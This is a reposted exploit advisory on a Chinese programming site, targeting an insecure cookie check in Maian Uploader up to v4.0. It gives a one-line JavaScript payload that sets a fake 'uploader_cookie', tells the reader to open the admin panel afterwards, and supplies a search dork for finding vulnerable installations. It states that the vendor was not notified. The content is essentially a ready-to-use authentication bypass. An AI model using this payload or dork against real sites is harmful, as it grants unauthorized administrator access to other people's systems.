欢迎来到福编程网,本站提供各种互联网专业知识!

Maian Uploader

发布时间:1970-01-01 作者:佚名 来源:互联网
-[*]================================================================================[*]--[*]MaianUploader<=v4.0InsecureCookieHandlingVulnerability[*]--[*]======================================================
-[*] ================================================================================ [*]-

-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Uploader v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Uploader suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "uploader_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Uploader <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

相关推荐